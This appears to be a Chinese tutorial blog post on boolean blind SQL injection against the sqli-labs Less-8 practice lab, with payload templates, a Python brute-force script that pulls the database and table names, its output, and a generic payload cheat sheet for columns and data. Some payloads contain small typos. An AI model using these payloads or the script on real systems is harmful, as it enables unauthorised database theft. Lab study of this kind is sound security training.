sql注入盲注操作
最近在研究sql注入的时候,对盲注的玩法比较感兴趣,自己写了一些关于盲注的python脚本,此环境针对的是sqlilabs的第八关,其他场景也可以做类似改造。
1.爆数据库长度
payload:' and length(database())={}--+ //{}是爆破位置
2.爆破每一位数据库字符
payload:' and substr(database(),{},1)={} //第一个{}对应数据库名的索引,第二个{}对应索引值
3.爆破对应数据库的表个数
payload:' and (select count(table_name) from information_schema.tables where table_schema='{}')={}--+ //第一个{}对应指定数据库名,第二个{}对应表个数
4.爆破对应数据库的表的长度
payload:' and (select length(table_name) from information_schema.tables where table_schema='{}' limit {},1)={}--+ //填充位分别是数据库名,表的序号,表的长度
5.爆破对应数据库的表的名字
payload:' and substr((SELECT table_name from information_schema.tables WHERE table_schema='{}' LIMIT {},1),{},1)='{}'--+
6.代码展示
拖库也是用相似的payload,下面给出一下源代码,我的环境搭建在本地,url为"http://sqlilabs/Less-8/?id=1"。
#### 盲注获取数据
import requests
import time
header = {
"Host": "sqlilabs",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.60",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
"Connection": "close"
}
chars = "abcdefghijklmnopqrstuvwzxyABCDEFGHIJKLMNOPQRSTUVWZYZ0123456789~!@#$%^&*()_+<>?"
url = "http://sqlilabs/Less-8/?id=1"
length_payload = "' and length(database())={}--+"
def get_length(url, length_payload):
for x in range(1, 50):
ex_url = url + length_payload.format(x)
print(ex_url)
response = requests.get(ex_url, headers=header)
if "You are in" in response.text:
# print(response.text)
print("长度是" + str(x))
return x
length = get_length(url, length_payload)
data_payload = "' and (substr(database(),{},1))='{}'--+"
def get_data(url, data_payload, length):
data = ""
start_time = time.time()
for x in range(1, length + 1):
for char in chars:
ex_url = url + data_payload.format(x, char)
response = requests.get(ex_url, headers=header)
if "You are in" in response.text:
data += char
print("数据是" + data)
break
end_time = time.time()
print("用时为:{}".format(end_time - start_time))
# print(response.text)
return data
name = get_data(url, data_payload, length)
print("数据库名为:" + name)
table_count_payload = "' and (select count(table_name) from information_schema.tables where table_schema='{}')={}--+"
def get_table(url, table_payload, db_name):
for x in range(1, 50):
ex_url = url + table_payload.format(db_name, x)
print(ex_url)
response = requests.get(ex_url, headers=header)
if "You are in" in response.text:
# print(response.text)
print("表的个数是" + str(x))
return x
table_count = get_table(url, table_count_payload, name)
table_length_payload = "' and (select length(table_name) from information_schema.tables where table_schema='{}' limit {},1)={}--+"
table_name_payload = "' and substr((SELECT table_name from information_schema.tables WHERE table_schema='{}' LIMIT {},1),{},1)='{}'--+"
def get_table_name(url, table_length_payload=table_length_payload, table_name_payload=table_name_payload,
table_count=table_count, db__name=name):
table_list=[];
start_time = time.time()
for i in range(1, table_count + 1):
data = ""
# 判断表的长度
for len in range(1, 50):
ex_url = url + table_length_payload.format(db__name, i - 1, len)
response = requests.get(ex_url, headers=header)
# print(ex_url)
if "You are in" in response.text:
# print(response.text)
# print("第{}表的长度是{}".format(i, len))
# 找表名
for j in range(1, len + 1):
for char in chars:
ex_url2 = url + table_name_payload.format(db__name, i - 1, j, char)
# print(ex_url2)
response = requests.get(ex_url2, headers=header)
if "You are in" in response.text:
data += char
# print("数据是" + data)
break
table_list.append(data)
break
end_time = time.time()
# print("第{}个表名为{}".format(i, data))
print("用时为:{}".format(end_time - start_time))
return table_list
print(get_table_name(url))
7.结果展示
运行一下,看下结果。
长度是8
数据是s
数据是se
数据是sec
数据是secu
数据是secur
数据是securi
数据是securit
数据是security
用时为:1.7992594242095947
数据库名为:security
表的个数是4
用时为:6.969999313354492
['emails', 'referers', 'uagents', 'users']
我这里把payload输出注释了,有的小伙伴想看payload也可以自行打印。
8.常见盲注payload
我把常见的sql盲注payload总结一下:
爆数据库长度:' and length((select schema_name from information_schema.schemata limit 0,1))={}--+
爆数据库名:' and substring((select schema_name from information_schema.schemata limit 0,1),{},1)={}--+
爆指定数据库下表的个数:' and (select count(table_name) from information_schema.tables where table_schema='{}')={}--+
爆指定数据库下表的长度:' and (select length(table_name) from information_schema.tables where table_schema='{}' limit {},1)={}--+
爆指定数据库下表的名字:' and substr((SELECT table_name from information_schema.tables WHERE table_schema='{}' LIMIT {},1),{},1)='{}'--+
爆表的字段数目:' and (select count(column_name) from information_schema.columns where table_schema={} and tabe_name='{}')={}--+
爆表的字段长度:' and (select length(column_name) from information_schema.columns where table_schema= '{}' and table_name= '{}' limit {},1)={}--+
爆表的字段名:' and substr((select column_name from information_schema.columns where table_schema= '{}' and table_name= '{}' limit {},1),{},1)='{}'--+
爆指定表数据个数:' and (select count(*) from {})={}--+
爆指定表下的指定字段长度:' and length(substr((select {} from {} limit 0,1),1))={}--+
爆指定表下的指定字段数据:' and substr((select {} from {} limit 0,1),1,1)={}--+